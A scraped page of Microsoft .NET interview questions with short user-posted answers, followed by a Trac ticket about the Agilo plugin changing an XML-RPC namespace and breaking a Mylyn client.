In .NET Compact Framework, can I free memory explicitly without waiting for garbage collector to free the memory?
jsubha2009
- Jun 11th, 2010
You can also explicitly free the object from memory using an assignment statement like:

Class1 obj = new Class1();
obj = null;
MagikMan74
- Jan 27th, 2010
Calling the garbage collector does nothing but let the garbage collector know you're ready for it to run. There is no way of forcing it to start as it runs on its own schedule. .Dispose() and == null are the only ways to truly free up resources.
1) Please write an example of implicitly converting an object to string. 2) Please write an example of explicitly converting an object to string. 3) Please write an example of rounding up the value "55.555".
jsubha2009
- Jun 11th, 2010
Objects cannot be implicitly converted to strings.The converting datatype must be similar and within the range of the to be converted data type and Only certain datatypes can be converted easily impli...
Yogesh Rathod
- Jan 11th, 2007
class Foo
{
    string val;
    // Allow implicit conversion from Foo string to object.
    public static implicit operator Foo(int args)
    {
        Foo foo1 = new Foo();
        foo1.val = args;
        re...
What is Abstraction?
vasudora
- May 28th, 2010
Abstraction is nothing but hiding the complexity from an end user. There is no need for the end user to know about the internal complexity. For example: to ride a car, all one has to know is how to move th...
peddakumar
- Jan 18th, 2010
Hiding of unnecessary data
How does .Net supports HASH MAPPING?
saranbvn
- Mar 29th, 2010
Hash map is similar to hash table, but it allows null values as keys and objects. HashMap is not synchronized whereas Hashtable is synchronized. We use a hash map when the data is in key/value pairs. ...
If you want to execute a SQL script while deploying your application, where will you do that in a deployment project?
gudise.chandu1155
- Feb 3rd, 2010
.Net command prompt
Jenpo
- Nov 7th, 2006
SQL query Analyzer.
Which command is used to keep a constraint into a datacolumnor, how to keep a constraint into datacolumn
daddycool111
- Jan 26th, 2010
This has to be done at the Dataset level, setting System.Data.DataSet.EnforceConstraints = true;
kspc84
- Nov 2nd, 2009
Using Trigger command.
Creating list of objects
Which is the better one to follow:
1. Creating an object every time, passing values as parameters to the constructor, and adding it to the list, or
2. Creating it once (i.e., with the default constructor), assigning values to properties, and adding it to the list?
chaugule_p
- Jan 20th, 2010
It is a scenario based decision the architecture of the application should take. Any parameters which are required for that object to perform minimal Operations, can be added to the default constructo...
v_n_r
- Dec 23rd, 2009
If the values are constant and known then, Create object once i.e, default constructor and assign values to properties and add it to the list.If the values are changing or the values are given at the ...
Define class, module and access specifiers.
mayankbhatnagar
- Jan 5th, 2010
Class is a reserved data type which is used to encapsulate similar types of methods and objects. For e.g., Cars is a class which holds Maruti 800 as an object in it, and tyres, seats etc. are its methods ...
chintan.desai
- Jul 31st, 2009
Class is a type where you can create your own type. Just as int data type in .Net which takes only integer values and having default API's such as toString(). Similarly, you can cre...
Access Private Members
How will you access private members of a class without using Reflection?
mohitkumaris
- Dec 11th, 2009
By creating a property. For e.g.:

private int x;

Now if we want to access it, we have to make a property:

public int xx
{
    get { return x; }
    set { x = value; }
}

Now in Main, when you create an instance of the class, just use that property to access it.
SasiKarasi
- Apr 23rd, 2009
By using delegates
Microsoft.NET Interview Questions
Opened 4 years ago
Closed 6 months ago
Last modified 6 months ago
#6297 closed enhancement (invalid)
Keep a consistent API when plug-ins subclass/override Trac classes
Description
I recently upgraded our Agilo installation to version 1.1.1. We soon found out that the upgrade broke the Mylyn connection to Eclipse, which we maintain using XML-RPC.
The cause seems to be that Agilo overrides the Milestone class with its own AgiloMilestone class. That caused the RPC namespace 'ticket.milestone' to change into 'ticket.agilomilestone', which in turn broke the Mylyn connection which relies on 'ticket.milestone.getAll'.
Now, I would not call this a bug in either product, but I think it is safe to assume that this is not the last case we will see of overriding classes in plug-ins. I would consider it a nice-to-have feature if the XML-RPC could be configured to provide a consistent API regardless of the names of the underlying implementing classes.
Attachments (0)
Change History (4)
comment:1 Changed 4 years ago by thijs
- Cc thijs added
comment:2 Changed 3 years ago by osimons
- Component changed from XmlRpcPlugin to AgiloForScrumPlugin
- Owner changed from osimons to andreat
comment:3 Changed 6 months ago by rjollos
- Resolution set to invalid
- Status changed from new to closed
You'll need to ask over on the Agilo mailing list, see AgiloForTracPlugin#BugsFeatureRequests for details. I don't think the Agilo guys monitor trac-hacks for bug reports.
comment:4 Changed 6 months ago by stefano.rago@…
@reporter: please upgrade to the latest Agilo for Trac version (currently 0.9.10/1.3.10). If you have problems/bug reports, please write to support@…
As from today's ticket #8550 discussion, I think we can safely conclude that this really is an issue for Agilo and not for the RPC plugin. RPC plugin can't possibly maintain a 'consistent API' when Agilo reworks, subclasses and replaces core Trac functionality.
RPC plugin is pluggable at all ends, and like how Agilo replaces Trac functionality there is no reason why they (or someone else) can't provide a replacement tracrpc.ticket module answering to same calls but resolving it their way.
The RPC plugin provides a functional test suite so that makes a good starting point for Agilo to test how their Trac & replacement API performs against expected RPC behavior. See my blog post for details of how to get the tests running. I'll happily apply patches with new tests if needed to further detail expected behaviour for clients. | http://trac-hacks.org/ticket/6297 | CC-MAIN-2013-48 | refinedweb | 427 | 50.36 |
you can replace code at runtime by the use of LD_PRELOAD (@windows you can use a similar technique called detours, quite fancy). what this does is to inform the dynamic linker to first load all libs into the process you want to run and then add some more on top of it. you normally use it like this:
% LD_PRELOAD=./mylib.so ls
and by that you change what ls does.
ls
for your problem i would try, which you can use like:
% BIND_ADDR="ip_of_ethX" LD_PRELOAD=./bind.so twinkle
here is how you build it:
% wget -O bind.c
% gcc -nostartfiles -fpic -shared bind.c -o bind.so -ldl -D_GNU_SOURCE
a longer howto is
similar hacks and tools:
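The preload library above works by intercepting the program's bind(2) call. When you control the code yourself, the same effect is just binding the socket to the desired source address before connecting — for a real NIC you would use that interface's IP instead of the loopback address used in this self-contained sketch:

```python
import socket
import threading

# Throwaway listener so the example needs no external server.
server = socket.socket()
server.bind(("127.0.0.1", 0))        # kernel picks a free port
server.listen(1)
threading.Thread(target=server.accept, daemon=True).start()

client = socket.socket()
# The one line that matters: pin the source address before connecting.
# With a real interface you would put e.g. the IP of eth1 here.
client.bind(("127.0.0.1", 0))
client.connect(server.getsockname())

print(client.getsockname()[0])       # 127.0.0.1
```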
I don't think it is possible to force a process to use a certain interface.
However, I think you might be able to play with ipchain/iptables and force that a certain port your process is listening at will only get packets coming through a particular interface.
Useful HOWTO:
Usually if a program has no option for setting listening interface, it's listening on ALL interfaces. (You can verify this with lsof -i).
Creating iptables firewall rules that drop incoming traffic pointed towards its ports on interfaces you don't want it to be visible on is the easiest thing to do.
Why would you want a program to use an interface other than the one connected to the server to talk to that server? And if the system isn't using the interface connected to a server to talk to that server, it's a system-level (routing table) issue and has nothing to do with which process happens to want to talk to that server.
Different servers on IP networks have different IP addresses. The kernel should know which interface to use to reach a particular IP address based on the routing table. If you're trying to talk to two different servers that have the same IP address, the system will get confused (because, among other things, it only indexes the connections internally by destination address). You can make that work, but it's a system-level fix involving putting one server in a separate logical network that's only connected to the machine through software NAT.
So if they have different IP addresses, use routes to select the correct interface. If they have the same IP address, you need to use NAT so that they appear to have different IP addresses to the system.
ip netns can do this.
TL;DR:
Create network namespaces, associate interfaces to them and then run "ip netns exec NAME cmd..."
Just check if your distro supports ip netns...
(Backtrack 5r3 does not, whereas Kali does ;) )
IN MORE DETAILS:
#create netns
ip netns add myNamespace
#link iface to netns
ip link set eth0 netns myNamespace
#set ip address in namespace
ip netns exec myNamespace ifconfig eth0 192.168.0.10/24 up
#set loopback (may be needed by process run in this namespace)
ip netns exec myNamespace ifconfig lo 127.0.0.1/8 up
#set route in namespace
ip netns exec myNamespace route add default gw 192.168.0.1
#force firefox to run inside namespace (using eth0 as outgoing interface and the route)
ip netns exec myNamespace firefox
Why is this better than binding the IP via LD_PRELOAD? Because LD_PRELOAD does not control the route that the process uses. It will use the first route.
To obtain these tools:
Install the Xcode Tools from developer.apple.com.
If you are running a version of
Xcode Tools other than 4.0, view the documentation locally:
In Xcode
In Terminal, using the man(1) command
Manual pages are intended as a quick reference
for people who already understand a technology.
To learn how the manual is organized or to learn about command syntax, read the manual page for
manpages(5).
For more information about this technology, look for other documentation in the Apple Developer Library.
For general information about writing shell scripts, read Shell Scripting Primer.
SHMGET(2) BSD System Calls Manual SHMGET(2)
NAME
shmget -- get shared memory area identifier

DESCRIPTION

If a new shared memory segment is created, the data structure associated with it (the shmid_ds structure, see shmctl(2)) is initialized as follows:
• shm_perm.cuid and shm_perm.uid are set to the effective uid of the calling process.
• shm_perm.gid and shm_perm.cgid are set to the effective gid of the calling process.
• shm_perm.mode is set to the lower 9 bits of shmflg.
• shm_lpid, shm_nattch, shm_atime, and shm_dtime are set to 0
• shm_ctime is set to the current time.
• shm_segsz is set to the value of size.
• The ftok(3) function may be used to generate a key from a pathname.
RETURN VALUES
Upon successful completion a positive shared memory segment identifier is returned. Otherwise, -1 is
returned and the global variable errno is set to indicate the error.
ERRORS
The shmget() system call will fail if:
[EACCES] A shared memory segment is already associated with key and the caller has no permission.
[ENOENT] IPC_CREAT was not set in shmflg and no shared memory segment associated with key was
found.
[ENOMEM] There is not enough memory left to create a shared memory segment of the requested
size.
[ENOSPC] A new shared memory identifier could not be created because the system limit for the
number of shared memory identifiers has been reached.
LEGACY SYNOPSIS
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
int
shmget(key_t key, int size, int shmflg);
All of these include files are necessary. The type of size has changed.
SEE ALSO
ftok(3), shmat(2), shmctl(2), shmdt(2), compat(5)
BSD August 17, 1995 BSD
The way to report a problem with this manual page depends on the type of problem: | http://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man2/shmget.2.html | CC-MAIN-2013-20 | refinedweb | 402 | 57.37 |
What is.jsonmunkák need to build a Glossary tool in javascript and fetch data from a Json file to parse in an html paragraph
I am.. retrieve the plate string from the JSON response. That is all I need.
I need a logo designed. You can tell me what type of design you need and I well design it for.
looking for lodash js developer immediatly to fix one issue to access keys in json. my budget is 600
Build me an angular website with JSON schema form [jelentkezzen be az URL megtekintéséhez] explain me how this works. Setup a database to serve the JSON ... create front end with angular to show the form built with the data coming from the database
...do that. What I now need is a SW Developer capable of helping me out it ...
I 've different files I need to load the information in the file in a excel format divided in columns.
...following characteristics: - needs to accept JSON format with social links (spotify followers, spotify playlist followers, facebook fans, instagram followers, twitter followers, youtube subscribers) - needs to decode the JSON, calculate followers from the links given, and return the number of followers in JSON - in the same moment, it needs to store the.
You will need to create the custom meta fields, everything needs to be stored professionally, there's a LOT of data that needs to be stored correctly, I will discuss more once
need API integrate a PHP of Language Detection JSON API [jelentkezzen be az URL megtekintéséhez] already apply API Key need work of [jelentkezzen be az URL megtekintéséhez] site 1. want service area markup 2. review stars in organic google results [jelentkezzen be az URL megtekintéséhez]
import search filter large json file . search edit export data in many ways xls pdf etc.. will provide sample of small file and example data inside it once we discuss. winner of this project who place best bid . thanks
Move a large number of strings from Json to Excel.
I got a 500k rows of text column and want to convert them into text column within R studio. Need help.
Hi all, Needed a little script written up in PHP. Making a cURL request and getting data back as $response in PHP. The response is in JSON and needs to be printed in HTML tables.
...com. Our website is
I need a expert who has knowledge about Azadian API Switch Modules. Rest details will be shared with winning bidder. Only experience bid .): [jelentkezzen be az URL megtekintéséhez] In case none returns anything
I need a expert who has knowledge about Azadian API Switch Modules. Rest details will be shared with winning bidder. Only experience bid .
...property data Looking to scrape right move for commercial property data in addition to zoopla that you helped me with. Rightmove commercial has a Get API to obtaining data in JSON format which iterated on index for a location and gathered , For. Eg [jelentkezzen be az URL megtekintéséhez]
Yebo!World is a geosocial app for global travellers. With the app you collect the world around you to build your own geo timeline and collects points. Check us out at [jelentkezzen be az URL megtekintéséhez] We have a robust back end in Go that you access via a JSON REST API with temporary tokens. We also have a native Android app developed in Android Studio (current...
I need<[jelentkezzen be az URL megtekintéséhez]> tree, String seperator) { for ([jelentkezzen be az U... | https://www.freelancer.hu/job-search/what-is.json/ | CC-MAIN-2018-43 | refinedweb | 581 | 72.56 |
This preview shows
pages
1–3. Sign up
to
view the full content.
View Full
Document
This
preview
has intentionally blurred sections.
Unformatted text preview: // Arup Guha // 11/7/06 // Solution for CIS 3362 DES Project // There are many weaknesses in this solution due to my laziness! // All of the constants in the algorithm should be stored in final // static variables, but I just wanted to read in the information // from the files instead of hard-coding them. // Also, the key should stay the same for encrypting one file, but // the blocks must change. This hasn't been indicated clearly. // Edited by Nickie McCall for 2010 Assignment import java.io.*; import java.util.*; public class DES { private int key; private int roundkeys; private int block; private static int stables; private static int IP; private static int IPInv; private static int E; private static int PC2; private static int P; private static int PC1; private static int keyshifts; // Reads all the information from the file I created based on the order // the values were stored in the file. My original posted file had some // errors in it, because some zeroes were stored as captial O's. I fixed // those issues in the file and have posted the corrected file with this // solution. public DES(int thekey) throws Exception { key = new int[64]; stables = new int[8][4][16]; IP = new int[64]; IPInv = new int[64]; E = new int[48]; PC2 = new int[48]; P = new int[32]; PC1 = new int[56]; keyshifts = new int[16]; block = new int[64]; // Sets the key to what was passed in. for (int i=0; i<64; i++) key[i] = thekey[i]; Scanner fin = new Scanner(new File("destables.txt")); // Reads in the initial permutation matrix. for (int i=0; i<64; i++) IP[i] = fin.nextInt(); // Reads in the inverse of the initial permutation matrix. for (int i=0; i<64; i++) IPInv[i] = fin.nextInt(); // Expansion matrix used in each round. for (int i=0; i<48; i++) E[i] = fin.nextInt(); // The permutation matrix P used in each round. for (int i=0; i<32; i++) P[i] = fin.nextInt(); // Reads in the 8 S-boxes! 
for (int i=0; i<8; i++) { for (int j=0; j<64; j++) { stables[i][j/16][j%16] = fin.nextInt(); } } // Reads in PC1, used for the key schedule. for (int i=0; i<56; i++) PC1[i] = fin.nextInt(); // Reads in PC2 used for the round keys. for (int i=0; i<48; i++) PC2[i] = fin.nextInt(); // Reads in the shifts used for the key between each round....
View Full Document
This note was uploaded on 07/13/2011 for the course CIS 3362 taught by Professor Staff during the Fall '08 term at University of Central Florida.
- Fall '08
- Staff
- Information Security
Click to edit the document details | https://www.coursehero.com/file/6327597/DES2/ | CC-MAIN-2017-13 | refinedweb | 477 | 74.49 |
This is the mail archive of the [email protected] mailing list for the GDB project.
> Date: Fri, 25 Nov 2011 17:41:02 +0200 > From: Eli Zaretskii <[email protected]> > > > Date: Fri, 25 Nov 2011 16:11:11 +0100 (CET) > > From: Mark Kettenis <[email protected]> > > > > >. > > But the patches suggested by Andrey didn't find any instances of the > above. So I submit that this danger is purely theoretical at this > point, or at least sufficiently rare in GDB to render this > consideration not important in practice for us. You're missing my point. A significant number of Andrey's changes (all-but-one of the ones I looked at) rename *local* variables because they have the same name as a function. My example above tries to show you that there is absolutely no problem with that, because if one wouldf accidentally try to invoke the function that has the same name as the local variable, the compiler would already generate an error. > > >. > > Clashing with library symbols _is_ a good reason to prevent GDB from > building. For *local* variables? > > And remove some perfectly usable and meaningful variable names. > > They can be easily replaced by no less meaningful and usable ones. But such a change requires one to actually read and understand the code. Such changes can therefore never be obvious, so they can't be fixed quickly. > > >! > > The same is true of any code you add or change, with the possible > exception of very trivial changes. For most changes, compiling on one system gives you reasonable confidence that things work on other systems as well. > > Most people that contribute to GDB are fairly competent programmers. > > Being competent doesn't mean being clairvoyant. How can we trust > ourselves to know by heart every single symbol in the standard > libraries? Exactly! That's why -Wshadow is so bad. Our "defs.h" pulls in lots of system headers. And on top of that we use options like _GNU_SOURCE, which invite the system to pollute the global namespace as much as it want. 
Since there is absolutely no problem with a local variable that has the same name as a library function, this is bad. | https://sourceware.org/legacy-ml/gdb-patches/2011-11/msg00702.html | CC-MAIN-2020-50 | refinedweb | 364 | 65.42 |
Being a contributor to the Code Project for quite some time now, it is commendable to see so many articles from various folks in the industry talk about the features of .NET and how a specific features work or what are some of the tips and tricks of the trade. This fever of .NET is very interesting to watch and rest assured that the storms caused by .NET will be as great as the storms caused by C++ when it was introduced. Walking down the web-site, I saw lots of articles on .NET, but I did not see one on: What is NET? What is it made up of? Why is there so much interest in it?
This article is a dedication to the above answers. In this article, I will give an understanding of what is .NET and why it came into existence. We will also see some of the core building blocks of .NET and how it is layered. For a deeper insight into each of the building blocks, you anyways have lots of good articles on the Code Project web site. So happy reading!
The world of computing till date has been chaotic. We have had various languages struggling to interoperate with each other, developers undergoing huge learning curves to shift from one language to another or from one application type to another, non-standard ways of modeling applications and designing solutions and huge syntactic differences between languages. The list goes on....
Past years have seen some solace in the form of enterprise "glue" applications and standards like COM, which put-forth a binary standard of interoperability between application components. But in reality, this was not always true (VB COM found it very difficult to take on VC++ COM). Also, as applications increased in their reach, it was found that rather than re-inventing the wheel for a solution, it was better to take the "service" of another applications specialized for a piece of work.
Thus from a paradigm where applications replicated code to provide common services, we have moved to a paradigm where applications are built as "collaborative units" of components working together. This simple shift has led to the collapse of the current set of architectures and demanded a new programming model:
Enter .
The .NET Framework has been developed to cater to the following objectives and requirements:
The .NET Framework is made up of two major components: the common language runtime (CLR) and the framework class library (FCL). The CLR is the foundation of the .NET Framework and provides various services that applications can use. The CLR also forms the “environment” that other applications run on. The FCL is a collection of over 7000+ types that cater to all the services, and data structures that applications will ever need.
The following diagram shows the .NET Framework, its hierarchy and the associated toolset. The diagram is so famous that you can spend some time memorizing its layout!!
At the base of the diagram, you see the operating system which can be (theoretically) any platform. The Common Language Runtime (CLR) is the substrate that abstracts the underlying operating system from your code. The minute it does this, it means that your code has to run using the services provided by the CLR and we get a new name called managed code. The CLR provides its services to applications by providing a standard set of library classes that abstract all the tasks that you will ever need. These classes are called as the Base Class Libraries. On top of this, other development platforms and applications are built (like ASP.NET, ADO.NET and so on). Language compilers that need to generate code for the CLR must adhere to a common set of specifications as laid down by the Common Language Specification (CLS). Above this, you have all the popular .NET languages.
Visual Studio .NET, then is the "glue" that helps your generate .NET applications and provides an IDE that is excellent for collaborative development.
In the subsequent sections, we will delve into the core layers of the .NET framework. Note that application development layers (like ADO.NET, ASP.NET etc) and development tools (VS.NET) are not dealt with.
The CLR is the platform on which applications are hosted and executed. The CLR also provides a set of services that applications can use to access various resources (like arrays, collections, operating system folders etc). Since this runtime "manages" the execution of your code, code that works on the CLR is called as managed code. Any other code, you guessed it, is called unmanaged code.
Compilers and tools expose the CLR's functionality and enable you to write code that benefits from this managed execution environment. To enable the runtime to provide services to managed code, language compilers must also emit metadata that describes the types that we develop in .NET. This metadata is stored along with the type file and makes it "self-describing". Using this information, the runtime automatically handles object layout and manages references to objects, releasing them when they are no longer being used.
When compilers emit code to run on the CLR, they do not emit machine language code. Rather, an intermediate language code is used called Microsoft Intermediate Language (MSIL). MSIL is like an object-oriented version of assembly language and is platform independent. It has a rich set of instructions that enable efficient representation of the code. When a code starts to execute, a process knowing as Just in Time Compilation (JIT) converts the MSIL code into the native processor instructions of the platform, which is then executed. This is shown in the following diagram:
Note that this conversion happens only once. Subsequent calls to the code will execute the native version only. Once the application dies down and is started again, this process is repeated.
The following are some of the benefits of the CLR:
Language interoperability is the ability of code to interact with code that is written using a different programming language. Language interoperability can help maximize code reuse and, therefore, improve the efficiency of the development process...
To fully interact with other objects regardless of the language they were implemented in, objects must expose to callers only those features that are common to all the languages they must interoperate with..
The common type system defines how types are declared, used, and managed in the runtime, and is also an important part of the runtime's support for cross-language integration. The common type system performs the following functions:
Windows programmers coding in C, tend to rely on the Windows API and functions in third-party DLLs to get their job done. C++ programmers often use class libraries of their own creation or standard class libraries such as MFC. Visual Basic programmers use the Visual Basic API, which is an abstraction of the underlying operating system API.
In the .NET Framework, all these anachronistic API’s are done away with. Rather a new set of functions branded as the framework class library are introduced which contain more than 7000 types.
To make learning and using the FCL more manageable, Microsoft has divided this namespace classes that represent windows, dialog boxes, menus, and other elements commonly used in GUI applications are present. A separate namespace called System.Collections holds classes representing hash tables, resizable arrays, and other data containers. Yet another namespace, System.IO, contains classes for doing file I/O.
The following diagram shows the FCL classes and their associated namespaces.
Hopefully, this article has distilled some of the terms in the .NET platform and explained why .NET is required. The .NET framework is a huge ocean and it will take some time for applications to be mature in it. Microsoft is also gearing to release its next version of server operating systems (2003) which provide lots of features for .NET applications. Expect the next version of SQL Server (code named Yukon) to have a .NET flavor too!! It is important, thus, to understand what the framework provides to us and what new features can applications target in the future and this is where this article. | http://www.codeproject.com/Articles/3992/What-is-NET?fid=15214&df=90&mpp=25&noise=5&prof=True&sort=Position&view=None&spc=None | CC-MAIN-2016-26 | refinedweb | 1,358 | 55.84 |
01 August 2012 06:35 [Source: ICIS news]
MELBOURNE (ICIS)--Korea Alcohol Industrial has reduced its domestic ethyl acetate (etac) price by won (W) 80/kg ($0.07/kg) on 1 August to boost its competitiveness over imports from China, said several importers on Wednesday.
The South Korean producer has cut its domestic etac price to W1,180/kg ex-works (EXW) for August from won (W) 1,260/kg EXW in July, the importers said.
The producer’s July pricing was itself a W80/kg reduction from June.
“[Korea Alcohol] is trying to increase its price competitiveness versus etac of ?xml:namespace>
“Inventories of imported etac are quite high at the moment, after importers bought about 8,000 tonnes for July delivery,” said a separate importer.
Purchases of Chinese etac for delivery in July were mostly concluded at $905-910/tonne (€733-737/tonne) CFR (cost & freight)
Etac of China-origin incurs a minimum anti dumping duty (ADD) of 3.14%, in addition to an import duty of 5.5%.
Korea Alcohol Industrial is
South Korean etac demand in 2011 was estimated by market sources at 90,000-100,000 tonnes. Most of the 69,000 tonnes of etac imported in 2011 came from
($1 = W1,130)
( | http://www.icis.com/Articles/2012/08/01/9582695/korea-alcohol-cuts-august-etac-prices-to-boost-competitiveness.html | CC-MAIN-2015-06 | refinedweb | 208 | 53 |
Hi!
I have trained a Resnet20 model and record the train and test losses epoch per epoch. Here is the plot
The fact that the test loss has a hieratic behaviour is an other subject (see Resnet: problem with test loss for details).
Schematically, during the training phase of the model, after all the dataloading, minimzer/scheduler init, for each epoch:
for epoch in range(start_epoch, args.epochs + 1): train_loss = train(args, model, device, train_loader, train_transforms, optimizer, epoch) test_loss = test(args, model, device, test_loader, test_transforms) # save model ... state = { 'epoch': epoch + 1, 'model_state_dict': model.state_dict(), 'scheduler_state_dict': scheduler.state_dict(), 'optimizer_state_dict': optimizer.state_dict() } torch.save(state,"model.pth")
In the
train() function:
def train(args, model, device, train_loader, transforms, optimizer, epoch, attack=None, **attack_args): # switch network layers to Training mode model.train() train_loss = 0 # to get the mean loss over the dataset (JEC 15/11/19) # scans the batches for i_batch, sample_batched in enumerate(train_loader): img_batch = sample_batched['image'] #input image ebv_batch = sample_batched['ebv'] #input redenning z_batch = sample_batched['z'] #target new_img_batch = torch.zeros_like(img_batch).permute(0, 3, 1, 2) #for CrossEntropyLoss no hot-vector new_z_batch = torch.zeros(batch_size,dtype=torch.long) for i in range(batch_size): # transform the images img = img_batch[i].numpy() for it in range(transf_size): img = transforms[it](img) new_img_batch[i] = img # transform the redshift in bin number z = (z_batch[i] - z_min) / (z_max - z_min) # z \in 0..1 => z est reel z = max(0, min(n_bins - 1, int(z * n_bins))) # z \in {0,1,.., n_bins-1} => z est entier new_z_batch[i] = z # send the inputs and target to the device new_img_batch, ebv_batch, new_z_batch = new_img_batch.to(device), \ ebv_batch.to(device), \ new_z_batch.to(device) # reset the gradiants optimizer.zero_grad() # Feedforward output = model(new_img_batch, ebv_batch) # the loss loss = F.cross_entropy(output,new_z_batch) train_loss += loss.item() * batch_size # backprop to compute the gradients loss.backward() # perform an optimizer step to modify the weights optimizer.step() # return some stat return train_loss/len(train_loader.dataset)
For the
test() function it is essentially the same code but with
model.eval()switch and
- the use of
with torch.no_grad():which is above the loop on the batches
Now, I have setup an other program for debugging. The philosophy is the following, once the last “model.pth” checkpoint is loaded
- use the same training and testing samples used for the training job described above, and also use the same random seeds init, the same data augmentation schema also
- use in place of the train/test function, a single process function which sets the model.eval() and the
with torch.no_grad():and then loops on the batches to computes the mean losses
So, I would have expected that the model parameters (notzbly the Batch Norm param stats) would be frozen, such that I would recover the test and train losses values but, this is not the case:
Train mean loss over 781 samples = 4.95804432992288 Test mean loss over 781 samples = 4.958497584095075
Have you an idea for instance why the loss computed with the same training set used during the training job is around 5 while it was around 2.5 !!!
Does the model saved at each epoch after a train followed by a test, has lost the BatchNorm parameters and so after reloading the model the two sets are recongnized as fresh sets ??? | https://discuss.pytorch.org/t/pathological-loss-values-when-model-reloaded/64545/15 | CC-MAIN-2022-33 | refinedweb | 543 | 55.64 |
Jorey Bump wrote ..
>.
As I gave as response to a recent question, this is possibly better solved
by writing:
import os
from mod_python import apache
directory = os.path.dirname(__file__)
slave = apache.import_module("slave",[directory])
def hello(req):
return slave.hello
Everyone has their own personal opinions on how best to use mod_python.
As to my own two cents worth, although mod_python uses Python, the
environment which it is running under isn't like running Python from the
command line. One is using it in the context of a web server and what
people tend to expect in doing stuff with web servers is that they can use
the same resource name in different locations of the URL namespace.
Because people are using mod_python/Python specifically to build web
applications, I believe that this expectation about using the same
resource names in multiple places is an overriding factor and any design
should accomodate this practice.
Thus, I would suggest that best practice would be:
1. Only use the "import" statement to import modules which have been
provided with Python, are installed into the "site-packages" directory
or are clearly seperated out into a directory distinct from the document
hierarchy. In this later case PythonPath should be used to denote where
that directory is.
2. That sys.path should not ever include any directory which is a part of
the document hierarchy. Unfortunately the way handlers are setup this
is done by default. This can be avoided though by setting PythonPath
explicity at the same point PythonHandler is defined. If PythonPath isn't
being defined anyway to add in extra external directories containing
application specific modules, then PythonPath should be set to "sys.path"
to ensure the document directory isn't added.
3. Always use apache.import_module() to import relative code files which
are contained within the document hierarchy. Because of (2) above, one
wouldn't be able to rely on sys.path though, so one should calculate the
exact directory that a code files resides in. This can be done by using
__file__ as described above. The directory would then be supplied to the
import module method to ensure that only that directory is searched.
In other words, a clear distinction is drawn. If it is outside the document
hierarchy, then "import" must be used with sys.path defining the search
path. Because "import" is used, modules outside of document hierarchy
must be uniquely named.
Inside the document heirarchy always use import_module() and always
define the exact directory you want something loaded from. Within the
document hierarchy, rather than calling them modules, they should be
seen as code files and duplicates should be allowed in different
directories.
All that now would need to be done is to fix import_module() so that it
copes properly with loading from the document hierarchy code files
with the same name in different directories. This isn't actually that hard
to do, but at the moment we seemed to be bogged down in arguing
about whether it is right or not.
Graham | https://modpython.org/pipermail/mod_python/2005-January/017221.html | CC-MAIN-2022-21 | refinedweb | 507 | 55.03 |
[
]
Benson Margulies commented on CXF-1084:
---------------------------------------
Here's the story. ServiceWSDLBuilder knows about TNS, but it doesn't have any visibility of
namespace maps. These live inside the namespace context of the xml schemata.
Essentially, when a databinding, (e.g. Aegis) wants to supply a namespace map, that needs
to be visible to ServiceWSDLBuilder, which needs to sort them out as a more complex version
of what it already does with target namespace comparison. If two services disagree about the
prefix map, then one of them has to be booted out into an import.
I wonder if there's a JAXB angle here related to @XmlNs.
The question here is per-schema namespace maps versus per-service. The Aegis map is at the
level of the entire databinding, so all the schema in a service (which share, of course, the
Aegis databinding instance) will share a namespace map. In Aegis, the schemas all can end
up with independent XmlNs. Those namespaces that end up at the JAX-WS level (and thus in the
Service model), can they have @XmlNs? Should prefixes float up from schemas to the service
level in JAXB? What if they conflict?
> namespace control in aegis (with jaxws) don't work for the wsdl element, only for the
schemas
> ---------------------------------------------------------------------------------------------
>
> Key: CXF-1084
> URL:
> Project: CXF
> Issue Type: Bug
> Components: Aegis Databinding
> Affects Versions: 2.0.2
> Reporter: Benson Margulies
> Assignee: Benson Margulies
>
> When aegis is used with the JaxWs front-end, the namespaceMap on the data binding has
no effect on the prefixes used for the wsdl element, and thus for the parts and related bits.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online. | http://mail-archives.apache.org/mod_mbox/cxf-issues/200710.mbox/%3C28710764.1193005670832.JavaMail.jira@brutus%3E | CC-MAIN-2017-43 | refinedweb | 290 | 71.85 |
VJET/Typing Functions with VJETDoc
Latest revision as of 14:08, 5 December 2012
JavaScript gets its work done with Functions. As we already saw, Function is a native type in JavaScript. Similar to Array, JavaScript has more than one way to create them.
Contents
- 1 Example JavaScript functions declaration/expression
- 2 VJETDoc Structure for Functions
- 2.1 Function Ref and Function Expression
- 2.2 Typing the return type of a function
- 2.3 Typing the arguments and return type of a function
- 2.4 Function and argument names matching VJETDoc?
- 2.5 More about Function Expressions and their usage
- 2.6 Calling one function with another function as argument
- 2.7 A function returning a function
- 2.8 Typing a function in an Object Literal
- 2.9 Function Assignment
- 2.10 Functions and Globals
- 2.11 Optional Arguments
- 2.12 Variable Arguments
- 2.13 Multi-type Arguments
- 2.14 Relationship of physical function declaration and VJETDocs
- 2.15 Overloaded Functions
- 2.16 More on function signatures
- 2.17 Access Control with Overloading
- 2.18 Return types ambiguous for same args
Example JavaScript functions declaration/expression
Here are the 3 flavors of Function creation in JavaScript:
// Function declaration
function max(a, b) { return (a>b) ? a : b ; }

// Function Expression via declaration w/Assignment
var myMax = function(a, b) { return (a>b) ? a : b ; }

// Function Expression via Function constructor
var f = new Function('a', 'b', 'return (a>b) ? a : b')

var out = vjo.sysout.println ;
out(max(10, 20)) ;
out(f(10, 20)) ;
out(myMax(10, 20)) ;
console>
20.0
20.0
20.0
The last two are really function expressions. Such an expression could be assigned to a local variable, as in the example, or passed as an argument to another function, and so on.
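A minimal sketch of the "passed as an argument" case, using plain JavaScript (the function and variable names here are invented for illustration):

```javascript
// A function that takes another function (a comparator) as an argument
function pickBest(a, b, compare) {
  // If compare(a, b) is true, a wins; otherwise b wins
  return compare(a, b) ? a : b;
}

// Passing an anonymous function expression as the comparator
var best = pickBest(10, 20, function (x, y) { return x > y; });
// best is 20: compare(10, 20) is false, so b is returned
```

The same expression could just as easily have been stored in a variable first and passed by name.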
VJETDoc Structure for Functions
Here is the Vjet structure for a function declaration:
Optional-Arg-Suffix: "?"
- Used for optional arguments.
- Optional arguments must be consecutive
- An optional argument may be the last argument declaration
- A series of optional arguments can end with a variable argument declaration
Variable-Args-Suffix: "..."
- Used for variable arguments.
- Only one allowed in a function declaration
- A variable argument may be the only argument declaration
- If present must be the last argument declaration
Argument: Type [Optional-Arg-Suffix | Variable-Args-Suffix] [Simple-Name]
Arguments: A single Argument or comma delimited list of Argument's.
Throws: A single Type or comma delimited list of thrown Type's
